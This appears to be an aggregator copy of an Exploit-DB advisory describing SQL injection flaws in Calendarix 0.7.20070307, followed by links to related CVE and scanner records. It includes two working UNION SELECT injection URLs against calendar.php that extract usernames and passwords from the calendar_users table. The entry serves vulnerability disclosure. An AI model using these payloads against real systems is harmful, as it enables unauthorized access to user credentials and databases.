Lucene search
Jesper JurcenoksEDB-ID:30234HistoryJun 25, 2007 - 12:00 a.m.
Calendarix 0.7.20070307 - Multiple SQL Injections
2007-06-2500:00:00
Jesper Jurcenoks
www.exploit-db.com
11
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/24633/info
Calendarix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Calendarix 0.7.20070307; other versions may also be affected.
http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 Related
prion
prion
Sql injection
2007-06-26 17:30:00
Sql injection
2008-11-26 01:30:00
cve
cve
CVE-2007-3183
2007-06-26 17:30:00
CVE-2008-2429
2008-11-26 01:30:00
nessus
nessus
Calendarix calendar.php Multiple Parameter SQL Injection
2007-06-26 00:00:00
cvelist
cvelist
CVE-2007-3183
2007-06-26 17:00:00
CVE-2008-2429
2008-11-26 01:00:00
nvd
nvd
CVE-2007-3183
2007-06-26 17:30:00
CVE-2008-2429
2008-11-26 01:30:00
securityvulns
securityvulns